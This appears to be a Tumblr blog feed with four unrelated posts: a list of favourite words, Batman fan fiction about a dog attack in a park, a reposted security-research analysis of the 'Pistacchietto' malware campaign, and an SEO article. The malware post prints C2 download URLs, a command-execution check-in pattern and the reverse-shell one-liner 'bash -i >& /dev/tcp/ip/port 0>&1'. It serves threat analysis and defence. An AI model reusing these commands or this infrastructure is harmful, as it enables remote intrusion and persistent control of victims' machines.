#that's not the same snippet of text obviously copy-pasted in different places on google
Text
Favorite words
I keep a file on my computer of my favorite words, which are usually selected for phonaesthetic reasons, or because they are semantically or grammatically interesting. This is the list as of the most recent entries (”velico” and “Ushakaron”):
Individual words
analáugns (Gothic): hidden (nom. m. sg.)
anchorhold (English): the cell of an anchorite, in which the occupant is entombed as a kind of living saint
Apocryphan (invented): from World of Warcraft; proper name, of the pre-Cataclysm location “Apocryphan’s Rest” in the Badlands zone
armōsts (Gothic): poorest (nom. m. sg.)
ashkandi /,æʃ 'kɑn di/ (invented): proper name (World of Warcraft)
bearonæss /'bæɑɹ o ,næs/ (Old English): wooded headland (from bearu, "grove")
beinahrúgu (Old Norse): bone pile (dat. of beinahrúga)
carcern (Old English): prison (from Latin)
coalesce, coalescent (English)
crepuscular (English)
darkling (English): in darkness
daroð (Old English): javelin, projectile, “dart” in the older, more expansive sense
deliquesce (English), become liquid, esp. through organic decomposition
deosil (English): variant spelling of ‘deasil,’ turnwise; from Scottish Gaelic deiseil or deiseal, meaning ‘southward, sunward, counterclockwise;’ see also "widdershins," etymologically "anti-sunwise" and therefore counterclockwise in the northern hemisphere.
effloresce, efflorescence, efflorescent (English): to burst forth into bloom, to flower; from Latin effloresco, “I blossom, I flourish”
Enakro (invented): from Warcraft III; proper name, from the name of the multiplayer map “Enakro’s Way”
Eskhandar /'ɛsk hænd ,dɑɹ/ (invented): from World of Warcraft; proper name
etiäinen (Finnish): a type of folkloric apparition
exarch (English): a Byzantine provincial governor, particularly of an exarchate like Ravenna or Africa, from Greek ἔξαρχος.
fralusanō (Gothic): lost, gone away (nom. f. weak sg.)
gevaisa (invented): a tomb of living words; term of art among wizards of the Discworld; cf. Hebrew geniza, "a storeroom containing books which cannot be used, but which nevertheless cannot be destroyed because they contain God's name"
gnist (Danish): spark; related to OE gnāst, ON gniesta, SWE gnista, OHG gneisto, MHG gneiste
hellwara (Old English): ‘of the inhabitants of hell’ (gen. pl. of f. hellwaru or m. hellwaran)
hnasqus (Gothic): soft; cognate of OE hnesce, “soft,” ModE. dialectical nesh “wimpish, weak”
idaltu (Saho-Afar): elder, firstborn; cf. Homo sapiens idaltu, the (obsolete) classification of the “Herto man” specimen, human remains of about 150,000 years of age discovered in the Afar triangle, which were some of the oldest modern human remains known at the time of their description.
idreigonds (Gothic): repentant (nom. m. sg.)
iktsuarpok (English): the feeling of anticipation waiting for someone to arrive, often leading to repeatedly going outside to check for them; from Inuktitut ᐃᒃᑦᓱᐊᕐᐳᒃ itsoarpok, “goes outside repeatedly to check if a visitor has arrived yet.”
incunabulum (English): an early printed book; something in its infant stages; from Latin incunabula, ‘swaddling clothes, cradle, birthplace.” The change in ending is a result of the medieval form incunabulum, which was a singular back-formation of a noun previously found only in the plural.
incus (Latin): "anvil"
inwitwrāsen (Old English): ‘chain of deceit’
Iolanthe (Greek): proper name meaning ‘flower of the violet’
irgendwo (German): somewhere, anywhere
κακοΐλιον (Ancient Greek): proper name (‘Kakoilion’); dysphemism for Troy; compound of κᾰκός, “bad, vile, evil,” and Ἴλιον, “Ilion/Troy/Wilusa.” Translated variously as "evil Ilios" (A.T. Murray) or "Destroy" (Fagles, pun very much intended); a poetic hapax legomenon in Homer's Odyssey, used by Penelope for Troy.
kasterborous /kæs 'tɝɹ bɔɹ oʊs/ (invented): proper name of the constellation in Doctor Who containing Gallifrey; possibly Gallifreyan
lhammas (invented): the Elvish (Quenya?) name of a work of fictional sociolinguistics by J.R.R. Tolkien outlining the relationship of the languages of Middle Earth, later superseded; borrowed as a term for "a scheme of invented languages; the historical and aesthetic plan of languages in a constructed world; such scheme in the abstract, or a document laying out such a scheme"
lint (invented): quick, clever; possibly coined by Tolkien, and of no particular language; it formed the root of such words in several constructed languages of his that were unrelated, simply because he liked the sound-meaning relationship
listopad (Polish): November; literally, “leaf-fall”
mæw (Old English): seagull
mamihlapinatapai (Yaghan): glossed as ‘a look shared by two people wishing the other would initiate something that they both desire but which neither wants to begin.’ The word is a regular derivation from ihlvpi, “to feel awkward, to be at a loss,’ with various grammatical affixes of voice, aspect, and so forth, and might be more accurately translated as ‘to make each other both feel awkward.’
narthex (English): antechamber or entrance area of some Christian churches; from Greek νάρθηξ, “giant fennel, box for ointments”
neorxnawang (Old English): ‘field of heaven’
opalescent (English): iridescent in a manner resembling opal
orcnaw (Old English): evident
razda (Gothic): voice
reordberend (Old English): ‘voice-bearer,’ i.e., a poetic word for a human being
ríastrad (Irish): battle frenzy, berserker rage, warp spasm
ruinenlust (German): literally ‘desire for ruins;’ yearning for the past evoked by ruins
Saoshyant /'saʊ ,ʃyənt/ (English): eschatological figure of Zoroastrian scripture and tradition who brings about the final renovation of the universe, the Frashokereti. From Avestan 𐬯𐬀𐬊𐬳𐬌𐬌𐬀𐬧𐬝 saoš́iiaṇt̰.
Sargasso (English): proper name applied to a region of the western Atlantic; from Portuguese sargaço, of unknown ultimate origin)
searonet (Old English): web of guile, web of cunning
Sumer (English): proper name, from Akkadian Šumeru, of uncertain origin but potentially related to Hebrew שִׁנְעָר Shin’ar, Egyptian sꜣngꜣr , and Hittite Shanhar(a), all meaning “southern Mesopotamia;” has also been linked to the Sumerian endonym 𒊕𒈪𒂵 sag̃-gig-ga, “black-headed people, the Sumerians”
talast (Old English): 2nd person singular present active indicative: thou reckonest, thou dost consider
tīrfæst (Old English): glorious
tramountayne (Middle English fr. Latin via Italian): the north; the north wind; the north star (rare) (from Latin transmontanus)
Tuscarora (English): proper name of a Native American people, from Skarure skarū’ren’, “hemp gatherers.”
Tyree (English): found as a personal name and surname (cf. Mount Tyree in Antarctica, named for a U.S. Navy rear admiral); name of a fictional planet in Star Trek: Deep Space Nine; from Tiree (Scottish Gaelic Tiriodh), the most westerly island of the Inner Hebrides.
Ushakaron (English): proper name of a star; according to unsourced claims, the triple star ξ Tauri, possibly from the Akkadian word for “avenger”
velico (Italian): sailing
westengryre (Old English): ‘terrors of the wasteland, terrors of the desert’
whyssyne (Middle English): cushion
wodwo (Middle English): woodwose, a wild man of the woods
þancoi (Old English): thoughtful
þystro (Old English): darkness (nom./acc. strong n. pl.)
Phrases or expressions
uncleftish beholding ("Uncleftish Beholding," by Poul Anderson, English): "atomic theory" as calqued into solely Germanic roots
proclarush taonas (Stargate SG-1, supposed ‘Ancient’ language): "Taonas, lost in fire"
varg í véum (Vǫlsunga Saga, Old Norse) "a wolf in holy places," i.e., an outlaw (equivalent to skógarmaðr)
wære fræton (Exodus, Old English): "they ate the treaty," i.e., they broke it
hapax legomenon (from Greek ἅπαξ λεγόμενον): a word which occurs only once in a manuscript or particular textual corpus
táiknái andsakanái (Gothic, Luke 2:34), “disputed sign,” cf. KJV, “a sign which will be contradicted.”
#i really cannot find a reliable independent source for the etymology of 'ushakaron'#or even for which star it's supposed to be#that's not the same snippet of text obviously copy-pasted in different places on google#so if anybody can confirm or disconfirm its etymology and identification#i would appreciate it
93 notes
·
View notes
Text
NaNoWriMo 2019 Batfam Fic part 6
Part 6 of my Jason Todd Batfam fic where Jason eventually agrees to dog sit Titus, there are some deep seated issues, unintended animal therapy, snarky text messages between Robins and eventually some reconcilliation between father and son. Takes place in a murky in between time sometime after Damian was resurrected.
Same warnings as other installments: This is a very rough draft that is copied and pasted directly from my working google doc. Expect mistakes. These are also snippets, and there is skipped content between them.
also as for CONTENT; there are some flashbacks to violent things, some violence involving animals, references to dog fighting :(( and things like prostitution and homelessness are mentioned periodically. Also a lot of bad language.
Part 1
Part 2
Part 3
Part 4
Part 5
The dog park, in the end, is nicer than Jason expects. Even though it’s small, it’s got some nice, rolling hills, a couple benches set up at different points, next to small maple trees that look like must have been planted in the last two years, still waiting for them to grow big enough to actually shade the benches. They were naked now, fall being in full swing.
It’s still flipping cold and there’s a light drizzle that’s just uncomfortable, even with the hood of his jacket drawn up. Titus doesn’t seem too happy about it either but he’s got his waterproof coat on and the earmuff-sleeve-thing so he isn’t bothered so much by the cold. He let’s Jason cajole him into playing catch at least and runs freely after the tennis ball he sends flying.
After a bit he seems to get bored with it though and is more interested in the other dogs, so Jason lets him roam without thinking much of it. He looks like a big dumb idiot in the getup he’s got on but it just makes him look more friendly and less intimidating to the other dog owners so Jason counts it as a win when he takes his phone out to snap a picture of Titus sniffing some labradors butt.
“Real polite bud” Jason mumbles under his breath, as he lets his eyes scan over the milling group of people. He doesn’t mean to be doing it, doesn't even realizing he’s looking for threats until he spots one.
There are two men standing stock still next to one of the benches, a large Rottweiler sitting next to them with a spiked collar on a thick, black, leather leash. The guys don’t look tough so much as they look mean and Jason can see them watching the dogs, eyeing each one almost critically, staring at Titus for a little longer than he’d like. He doesn’t even really know what he’s looking at but he doesn’t like it, can feel the hair on the back of his neck stand up like some sort of sixth sense.
“Titus!” He lets out a loud whistle, clapping his hands to draw the dogs attention back to him. He trots back over easily, abandoning the other dog he’d be attempting to greet. Jason grabs his collar when he approaches, latching the leash back on, keeping an eye on the two thug looking guys who are now walking slowly in his direction. Jason tries to get a good look at them without making it obvious.
One is tall and thin, a shaved head and a nose that looks like it had been broken on a few different occasions. His eyes are half lidded, he looks bored, and with a brief direct glance he spots a deep scar on the back of his hand, raised and red skin in a curved line that looks distinctly like an animal bite if Jason had to guess.
The other one is heavy set, broad in the shoulders but of average height, close cropped dark brown hair and a chunk missing out of one of his ears. Sharp eyes that are focused directly on Titus. He’s the one holding the leash.
And the dog is the other thing.
Every other dog in the park just seems happy. Either excited and playing or relaxed. Tails wagging, panting, running around or just lazing about near their owners. There’s one half grown mutt on the other side of the park that’s being trained, learning how to sit and stay.
The Rottweiler walking next to this man does not look happy, or friendly, or excited. It’s big, moves gracefully, doesn’t seem to be in any sort of hurry but is looking at Titus and Jason both with eyes that Jason can only think to describe as….empty. If you can even think something like that about a dog.
They’re only 10 feet away when Jason tugs on Titus leash, ready to get the hell out of there before something nasty happens. And maybe he’s gotten rusty but hes just a little too slow.
Just as they turn around the broad shouldered man stoops down and unhooks the Rottweilers leash, says something sharp to the dog that he can’t catch and suddenly he’s lunging.
Jason has been in more fights than he can count, or remember, ones where his life is on the line, but there is nothing quite like having 140 pounds of solid muscle barreling towards you with a snarl like you’ve never heard, teeth bared and ready for sinking.
Titus immediately pulls hard on the leash, and Jason moves without thinking. It’s reflex more than training that has him throwing an arm out, right in the path of the big black dog. The tall thin guy shouts something just as teeth clamp down on his forearm, sink through his leather jacket to his skin and beyond.
“Shit!” Jason shouts, throws his other hand out, dropping the leash, he grabs at one of the dogs ears and yanks, hard, but the clamp down does not loosen, if anything it tightens and the dog lets out a guttural growl. Jason is swearing up a storm, stumbling and nearly falling on his ass trying to pull his arm out of the vice it’s being crushed in. He’s never been bitten by a dog before, at least not beyond a warning snap, and it fucking hurts.
The short guy is suddenly there, clapping his hands, he shouts at the dog again.
“Drop it!” And Jason’s arm is abruptly free, he actually trips and falls on his ass, feeling light headed and instantly furious.
Skinny guy has a hand around the Rot’s collar, holding him in place even though he’s already sitting down, looking business as usual like nothing even happened when there’s blood dripping out of its fucking mouth. Jason’s blood.
“What the fuck is wrong with you?!” Jason hauls himself to his feet, standing just as tall as the skinny guy and broader in the chest than the heavyset one, who looks wide eyed and nervous, in contrast to the tall one, who just seems mildly surprised.
“Holy shit man, I’m so sorry, he just lunged!” The short guy stutters out, fumbling to get the leash back on the dog.
“You expect me to believe that was the dog? I wasn’t born yesterday asshole.” He steps toward the stocky one but the Rot takes a step to meet him, letting out a low growl of warning.
“Whoa, Crusher no.” He swallows harshly, glances back at the tall one, who’d let go of the collar as soon as he attached the lead.
“Crusher? Are you serious?”
“I’m so sorry man, really, I didn’t exp- he’s never done anything like that before.” Jason doubted it, wanted to spit in the guys face.
“Chris, why don’t you take Crusher to the car? I can take it from here.” Guy has an accent like he’s from the West coast, words clear and almost overly pronounced. He’s got one hand stuffed in the pocket of his coat, the other holding a lit cigarette.
“Sure, yeah. I’ll uh, I’ll get him out of the park, just find me when you’re done.” Chris looks distinctly relieved to be out of the conversation.
Jason is reeling, what the actual fuck just happened? What was this? The short one had clearly given the dog some kind of command.
His instincts told him not to let the guy leave, to stop him in his path and get answers, but the dog was still a threat and Jason wasn’t in costume. He didn’t have any armor on and his identity was not hidden. He needed to be careful. His mind also finally registered the ear splitting sound of frantic barking from a large dog and he suddenly realized he hadn’t seen where Titus went.
He’d let go of the leash when the dog attacked and - He whipped his head around, feeling frantic for a split second before he spotted him just a few feet away, some random bystander holding his leash wrapped around a hand. It was a stocky woman, middle aged, and with a fat bulldog of some kind standing behind her. She looked stricken, face pale. Titus was pulling pretty hard on the leash and barking in a high pitched tone that definitely wasn’t natural for him, a near whine to it, but the woman stood her ground, feet planted hard.
Jason was distracted enough that the guy was already shuffling away, the Rottweiler following at matched pace. He should go after the guy, wanted very badly to go after him but he couldn’t leave some random woman with Titus, who was obviously frantic and upset.
Jason eyes Tall Guy, still standing there and watching him, expectant and bored look on his face, decidedly turns his back on him to handle Titus. The guy isn’t a threat, not to him, even if he has a weapon his posture is slouched, feet planted sloppily, his balance isn’t solid. He’s obviously not trained to fight and Jason could take him in a heartbeat if he felt the need. He needed to get his head back on straight before he talked to him, there was a heat curling in his stomach with a distinctive green tinge Jason needed to get a handle on.
He marched up to the woman with the bulldog, tucking his bleeding arm in close to his side. He was fuming, furious and totally struck dumb like he couldn’t remember being. He almost wondered if they knew who he was, why else would they randomly sick a dog on him?
“Are you alright?” The woman asked when he approached, eyebrows drawing up in the middle.
“Fine.” He tried not to snap at her, since she was literally the only reason Titus probably hadn’t either run away or gotten in a fight with that dog when it bit him, but he was so tightly wound it was hard to keep the edge out of his voice. “Thank you for grabbing his leash.”
She nodded, Titus shoved into him, lifting his front half off the ground repeatedly like he wanted to jump on him, whining, ears down. “I’m fine, buddy, I’m good. Stay down.” He grabbed Titus collar with his good hand and pulled down gently to get him to stay planted in the grass, he didn’t need to get clawed in the arm after that.
“Are you really sure you’re alright? You’re bleeding pretty….pretty bad.” She sounded a little breathless, as she finally relinquished Titus’ leash to him. She grabbed at her ponytail with her now free hand and tugged on it, a nervous habit if he’d ever seen one.
“I’ve had worse.” He was too busy looking over Titus and making sure there were no injuries he’d missed, that he wasn’t too late to keep the Rot away from him that he didn’t see how she reacted to that little confession. The ear muff thing had fallen down and he carefully tugged it back up over his ears, while trying to even out his breathing.
“That was pretty nuts man.” Jason stiffened and turned back, Tall Guy standing there, cigarette in hand, he took a long drag. “Why jump in like that? Your dog looks like he could hold his own in a fight.” And he was staring at Titus when he said it, eyes still bored, as they flicked up to meet Jason’s. Jason felt his shoulders hitching up.
“We should really call the police.” The woman interjected. “That dog is dangerous, need to-“
“No police.” Jason snaps just as Tall Guy says, “I don’t really think that’s necessary.”
“Not Necessary?” Her voice is sharp. “Your dog just attacked this man, he’s bleeding, he could have a broken bone or-“
“Nothing’s broken lady.” She snapped her eyes to him, looking at him like he was nuts.
“Regardless, I’m calling the police.” She reached in his purse, hanging off her shoulder and pulled out a cell phone. This was not good - the last thing Jason needed was to be questioned by the police while Bruce was out of town, even if he was a victim, he didn’t need to be recognizable to anyone, didn’t need Barbara recognizing his fake ID in a police report and drawing this whole incident up.
He also didn’t know why any of this just happened, and if somehow this guy knew who he was….he didn’t want a civilian mixed up in that.
“Look lady.” He snapped at her, feeling guilty for the way she flinched back from him. “I appreciate the concern but I’d rather handle this myself.” He put a hint of threat in his voice, for both her and the asshole’s sake. Jason knew what he looked like, big, broad shouldered, well built and with a massive dog. “I don’t really think you wanna be involved.”
Her eyes darted between Jason and Tall Guy, like maybe she wanted to argue, but was quickly thinking better of it. She clutched her own dog’s leash in a fisted grip, expression morphing to wary suspicion.
“Fine. Guess I’ll find a new dog park.” She snapped before turning on her heel and marching away. Bulldog waddling after her.
Sm͏a͏rt lady, Jason thinks as he watches her go. Finally turning back to the guy who’s just standing there, enjoying his cigarette without a care in the world.
6 notes
·
View notes
Text
Original Post from Security Affairs
Author: Pierluigi Paganini
In the past weeks, a new strange campaign emerged in the cyber threat Italian landscape, it has been tracked as “Operation Pistacchietto.”
Introduction
In the past weeks, a new strange campaign emerged in the Italian landscape. It has been baptized “Operation Pistacchietto” from a username extracted from a Github account used to serve some part of the malware. This campaign has been initially studied by C.R.A.M. researchers reporting the attacker seems to be Italian, as evidenced by some Italian words like “pistacchietto” or “bonifico” discovered into analyzed file names and scripts, and due to the location of most of the command and control servers.
Figure 1. Servers’ location.
After an initial recon, Cybaz-Yoroi ZLAB detected some peculiarities and interesting TTPs in place in this malicious operation, so we decided to dig further and analyze more samples related to this mysterious actor.
Technical analysis
The campaign is not very trivial and it is composed of several, specific, malware, created to hit devices belonging to different platforms, both desktop, and mobile. In the following sections, we analyze some of this malware, divided by targets’ architecture.
MS Windows Samples
The story starts from a basic fake Java page, inviting the user to update his Java version clicking on the link.
Figure 2. Fake Java update page.
Despite the page reports the filename “window-update.hta”, clicking on “Update” a file .bat will be downloaded.
Hash a22ac932707e458c692ba72e5f4ddb3317817ac3a9a1ccbcccbdf720a9bd2cd4 Threat Unknown Description BAT downloader ssdeep 192:/eIsseWdvqEB45kY7EBk2k0EBxbkdEBBmk/kgkWOQmxl1LXqiV/uvN:/wyB4WYwBkRNBeKBBBsDWwFw
Uploading this .bat file on VirusTotal emerges that it has a very low detection rate: only four anti-malwares were able to detect it.
Figure 3. Detection rate of the initial BAT dropper.
Inspecting the win.bat source code, at first glance, it seems to be written by a script kiddie or to be a first draft due the huge amount of comments. Moreover, the script is composed by two part: a first one includes a trick to ask user administrative privileges, the second one aims to download other components and to set persistence using the Windows Task Scheduler (schtasks). As shown in figure, the first part simply corresponds to a code snipped retrieved from Github public repositories.
Figure 4. Comparison between the attacker’s code and the Github’s one.
The second part, instead, checks the machine architecture and, depending on it, the malware downloads the right components, that are:
A text file containing new actions to execute, from config01.homepc[.it/svc/wup.php?pc=pdf_%computername%
The NETCAT utility for Windows, from config01.homepc[.it/win/nc64.exe and config01.homepc[.it/win/nc.exe
The WGET utility for Windows, from config01.homepc[.it/win/wget.exe and config01.homepc[.it/win/wget32.exe
Other malicious artifacts, from:
config01.homepc[.it/win/get.vbs
config01.homepc[.it/win/sys.xml
config01.homepc[.it/win/syskill.xml
config01.homepc[.it/win/office_get.xml
config01.homepc[.it/win/woffice.exe
config01.homepc[.it/win/init.vbs
config01.homepc[.it/win/winsw.exe
Figure 5. Part of BAT dropper’s code.
From the snippet, a series of commented URL paths emerge, which is the proof that the malware is under maintenance yet. During the analysis days, indeed, the bat file and some other artifacts are constantly changed and updated, adding and removing code lines, changing variables names, but without changing the server URL or the general behavior. These modifications, even if related to attacker’s proofs or test cases, make the file constantly low-detectable by anti-malwares, because its signatures change each time.
Other URLs embedded into the script, in commented way, are:
hxxps://github[.com/pistacchietto/Win-Python-Backdoor/raw/master
hxxp://verifiche.ddns[.net/{some_files}
Inspecting the repository, we found some artifacts also hosted on the config01.homepc[.it/win/ location, so probably the attacker used that platform during the development phase and config01.homepc.it as real server containing “production” malware. The URL verifiche.ddns[.netseems to be down at time of writing, it could be a server used in an old version of this malicious project or in a future one.
After downloading all the components, the batch script implants most of them into %windir% folder and one of them, the core of the malware, into C:Program FilesWindows Defender. Then, the script registers some automatic tasks through schtasks in order to start periodically the malicious artifacts.
Figure 6. Instructions to schedule the backdoor execution.
The following section reports a brief analysis of these malicious files.
Sample “office_get.xml”
Hash 1061e997486c793ab5561fd7df0c2eb36b9390a564101e7ae5cc8dbf9541f750 Threat Unknown Description XML Task Scheduler Config ssdeep 48:yei1q9dBQSRiylw9c9V9LTra+iaiudupRCRvA9ufAuRa7T5XHPsV8icvOyp+++:tdBdRiyuwdiaigVA9ll7dHFFvOC+
It is a simple XML file in which is defined the configuration for a new scheduled task. In particular, the task created using this configuration file has the only purpose of execute, in periodic way, a VisualBasic script located in C:WINDOWSget.vbs.
Figure 7. Command embedded into XML file.
Sample “get.vbs”
Hash 6edbf8b3f94d29be7c24676fbf2d1e4cdf00b1f7b9f31c2ce458d1e21b23af97 Threat Unknown Description VBS script ssdeep 48:eTGvmB9tJWBVn/Bn6+pmcN+yEa/5noEW/hRbr94fIn9+0RYcSniTGFurRwx:eTGO1Yr/V6gmDyPJoE0hxGfIn9D1ITlx
The script downloads a shared file from Google Drive: https://drive.google [.com/uc?export=download&id=1nT2hQWW1tOM_yxPK5_nhIm8xBVETGXdF
using a MSXML2.ServerXMLHTTP object. The file contains a list of servers URLs, as shown in figure:
Figure 8. C2’s IP addresses.
Two of them are IPv6 addresses: the usage of the new IP address standard is a rare feature in malware landscape. From the whois information related to these IPv6 addresses emerges that they are registered on the global ISP Hurricane Electric. This company also provides a free IPv6 Tunnel Broker service, able to act as a link between IPv4 and IPv6 protocols. There is no direct evidence of activity on that IPv6 addresses, however we think probably the attacker decided to masquerades its C2, which normally works over IPv4, behind the Hurricane’s IPv6 tunnel in order to make detection more difficult.
During the check-in, the malware proceed to extract some PC information, like computer name and MAC address, which will be sent to the server using a path composed by:
http://" & serverURL & "/svc/wup.php?pc=" & strComputerName & "_" & mac
The server responds with an encoded message indicating new actions the malware should perform. However, the VBS script seems to check only the “exec” field, as shown in figure.
Figure 9. Response from C2.
If “exec” parameter is set to “1”, then the script extracts the value of “cmd” parameter, containing the new command to execute, and run it on Shell. All the other fields, at the moment, are not considered by the malware, indicating that it may be still under development.
Figure 10. If EXEC parameter is set, execute the specified command.
After executing the received commands, the script opens connection towards malicious server using the Netcat tool previously downloaded, providing to the attacker an access to the victim’s shell.
Figure 11. Command to establish remote connection towards C2.
Samples “woffice.exe”, “woffice2.exe” and “NisSrv.exe”
Hash 3eecd459aa454f7973048af310c7086ff4a74efd5a3aee9f909cca324a0e2013 Threat Unknown Description EXE from woffice ssdeep 196608:eC0ma2TBEF4nfFzqgncRxhocAU/kfCf+51loM8XdFu/apXLl:eCI26dGnfCW51ittnNLl
The “woffice2.exe” and “NisSrv.exe” files are equal to “woffice.exe”, which is simply the compiled version of “woffice.py”, the Python source file hosted in the “Pistacchietto” repository. The Python code has the same behavior of the VBS bot previously analyzed, but it uses different C2 URLs, such as:
Figure 12. Other C2’s IP embedded into “woffice.py” file .
So, the attacker created different copies of the same malicious backdoor, and set them to run at the same time, probably as resilience technique.
Samples “sys.xml” and “syskill.xml”
Hash a9f5e4c294ce6fb3bbdc4cd1ce3b23136005ce1dd57b2e8d20ed2161eea9f62b Threat Unknown Description XML Task Scheduler Config ssdeep 48:yei1q9dBQSJiydw9c9V9Lvara+iaiudupRCRvA9ufAuRa7T5XhPsV8iILG+++:tdBdJiyGiGdiaigVA9ll7dhF2+
Hash 6d3e7adcf9626bbee6935c6e8ced13831ac419be19b9d13bc361bda402fbaca7 Threat Unknown Description XML Task Scheduler Config ssdeep 48:yei1q9dtQSJiydw9c9V9Lvara+iaiudupRCRvA9ufAuRa7T5XhPsV8ioXy+++:tdtdJiyGiGdiaigVA9ll7dhF0+
These files are two XML task scheduler configurations, which embed the following commands:
Figure 13. Commands embedded into XML file.
So, the first one starts a TCP connection every 1 minute using Netcat (“nc64.exe”), as previously shown, towards a new server “config02.addns[.org”. The second one, instead, kills all the active processes named “nc64.exe” every 5 minutes.
Linux, OSX and Android Samples
The attacker’s arsenal seems to be composed of weapons for different architectures: beyond Windows, there are some samples related to Linux, Mac, and Android devices.
In the Windows, Linux and Mac variant of the malware, the behavior is always the same: it implants the automatic execution of the Python backdoor previously shown.
Hash 61aaf7b301ed9f574ec3e37428e0e9c62875ddf8a075897408d5b1eb612097cc Threat Unknown Description Office.py Linux backdoor ssdeep 96:Urlxr+CkrZcGbSRonYZm/ZCweAM2eiuVzZ9Q6CsW7XpyMZEg59y5E6AwKwA:U7+CkrZcfnZgZEiuWEMZHs5E6+
In the following figure is shown the initial bash file used to set the schedule of the “woffice.py” backdoor, through the “crontab” and “systemctl” Linux commands.
Figure 14. Linux initial BASH dropper.
Obviously, all the Windows commands executed into the Win version of the backdoor must be replaced by the Unix one. So, the command “bash -i >& /dev/tcp/ip/port 0>&1” takes the place of the instruction used to establish the Netcat reverse shell in Windows.
Figure 15. Linux commands used to establish a connection with C2.
The Mac backdoor is very similar to Linux one, another time the “woffice.py” is the core payload.
Hash 008bab1cc06a8c9fcdbc0e539d7709de0d163acaf26d90c78c00e7c58fa29fc3 Threat Unknown Description Office.py OSX backdoor ssdeep 96:qTXEPcRrdj9iGxGy8g/VEhhBpypDR9jxmCY3leO2pDR9jx5jYO74MkWI7G9xcst:q9due/cfypO2z4M2Gl
Figure 16. OSX backdoor’s setup file.
Analyzing the repository emerges it is a copy of an OSX backdoor discussed in this blog post. Starting from this code, the attacker edited some modules to embed it in its own version of the backdoor.
Moreover, the arsenal malicious arsenal counts also an Android RAT. It is a copy of the popular “AhMyth Android Rat”, edited by the attacker to include its command and control server’s IP addresses.
Figure 17. Part of AhMyth RAT’s code modified by the attacker.
Conclusions
The “Pistacchietto” operation is more complex than we initially thought. Behind the lack of professional infrastructure, the “hiding in plain sight” strategy, the developer’s comments, the drafted malware code analyzed and the speculations about the possible amateur nature of this actor, we are in front of a long running espionage operation, active from years, and supporting at least four of the main computing platforms available nowadays, being able to infect Microsoft Windows hosts, Mac OSX systems, Linux servers and Android mobile devices.
We are still not aware of the purposes of this campaign, which could be most likely personally motivated rather than financially or state sponsored, but despite its limited numbers it represent an important warning security communities, individuals and companies should not ignore. Offensive capabilities to run criminal espionage operations are getting even more accessible to personally motivated cyber actors, confirming the expansion of the cyber threat panorama both in terms of volume and variety observed by security firms, observatories and associations from a decade ago to nowadays.
As a final remark, we would like to recall Italy also is not new of this kind of “fai–da-te” (homemade) espionage operations: back in 2017, the initially homemade Occhionero’s espionage campaign (CERT-Yoroi Early Warning N010117) lapped Public Administrations, notorious entrepreneurs and also the Italian Ex Prime Minister.
Further technical details, including Indicators of Compromise, are reported in the analysis published by the experts at the Cybaz-Yoroi ZLAB
https://blog.yoroi.company/research/op-pistacchietto-an-italian-job/
window._mNHandle = window._mNHandle || {}; window._mNHandle.queue = window._mNHandle.queue || []; medianet_versionId = "3121199";
try { window._mNHandle.queue.push(function () { window._mNDetails.loadTag("762221962", "300x250", "762221962"); }); } catch (error) {}
Pierluigi Paganini
(SecurityAffairs – Op Pistacchietto, malware)
The post Cybaz-Yoroi ZLAB shed the light on Op. ‘Pistacchietto’: An Italian Job appeared first on Security Affairs.
#gallery-0-6 { margin: auto; } #gallery-0-6 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-6 img { border: 2px solid #cfcfcf; } #gallery-0-6 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */
Go to Source
Author: Pierluigi Paganini Cybaz-Yoroi ZLAB shed the light on Op. ‘Pistacchietto’: An Italian Job Original Post from Security Affairs Author: Pierluigi Paganini In the past weeks, a new strange campaign emerged in the cyber threat Italian landscape, it has been tracked as “
0 notes
Text
How machine learning levels the SERP playing field
We don’t ordinarily think of Google when we think about competition in the digital marketing world, since it seems to reliably dominate most areas in which it does business. A recent segment discussing corporate monopolies on John Oliver’s “Last Week Tonight“ hilariously referenced Bing as the dominant search engine with a graphic that stated, “Bing. The best place to Google something.”
For the most part, however, the digital marketing sphere has been a fairly competitive landscape, though there were exceptions to this maxim. Established brands frequently dominated top SERP positions because of long-standing trust, fresh domains had to wait their turn in line, and black-hat SEO allowed webmasters to game the system and deliver high rankings for thin content. A decade ago, SEO agencies and webmasters could apply simple heuristics and buzzworthy keywords to rank content regardless of its utility to user intent or actual quality.
The Hummingbird update and subsequent rollout of RankBrain changed all of these notions entirely.
They should also be changing SEOs’ ideas of how to achieve success. Though many SEO experts understand the importance of RankBrain, or at least how important it will be, they still employ conventional strategies we made a living off of a decade ago.
In this column, I’ll explain why you should remodel the way you look at search engine optimization. And I’ll also offer some advice on machine learning applications and SEO strategies you can employ to compete in the cutthroat SEO landscape.
How machine learning revolutionized search
Machine learning is a subset of artificial intelligence that allows computers to learn independently of human intervention, learning in iterations by grouping similar properties and determining values based on their shared properties.
Google’s RankBrain, which the company says is its third most important ranking factor, is applied to determine the context of new search queries that it has not received before. RankBrain distinguishes the context of unlearned searches by pulling semantically similar keywords/phrases and comparing them with similar past searches to deliver the most relevant results.
Google employs machine learning technology to find patterns and make sense of relevant data when it analyzes user engagement with web pages in its SERP listings. With this data, Google’s algorithm evaluates user intent. From Google’s perspective, this helps filter results more effectively and rewards users with a better experience.
Currently, conventional signals are still applied to rank the best results. With each subsequent, relevant search, machine learning can analyze which web pages are receiving the best user signals and provide the best results to meet user intent. It’s important to note that machine learning isn’t instantaneous but would result in slow ranking changes based on growing data from its SERPs.
This has two broad implications for keyword research and ranking:
Keyword rank is no longer affected by dramatic shifts.
Google’s algorithm is more dynamic; different algorithms are employed for each unique search.
In more competitive niches, content quality and increased user engagement will slowly take precedence over conventional signals, leveling the SERP playing field. In low-volume searches, conventional ranking signals will still be applied as the de facto standard until enough data is available to determine user intent.
This has also brought semantic search to the fore for SEO experts. Semantic search allows content to rank for multiple keywords and get increased traffic by meeting the intent of various related search queries. The clearest example of semantic search’s impact is the related search field at the bottom of Google SERPs and what “People Also Ask” below the featured snippet field.
As Google becomes capable of understanding human intent and linguistic intelligence, technical SEO and keyword usage will take a back seat to user signals. Considering different algorithms are applied to unique searches, links will be reduced in their role as the arbiters of content quality, and smaller domains will have a better fighting chance to compete against industry titans organically.
If searcher intent determines which algorithm will be pulled for SERP listings, how do we optimize and even track this? The answer involves using both conventional strategies and our own machine learning technology.
Give the people what they want
Here are a few methods SEOs should be using to keep current with the evolving environment:
1. Improve user experience
Searchmetrics’ 2016 report on ranking factors illustrated just how important user signals were to organic ranking. The company found that user signals were second only to content relevance in terms of importance.
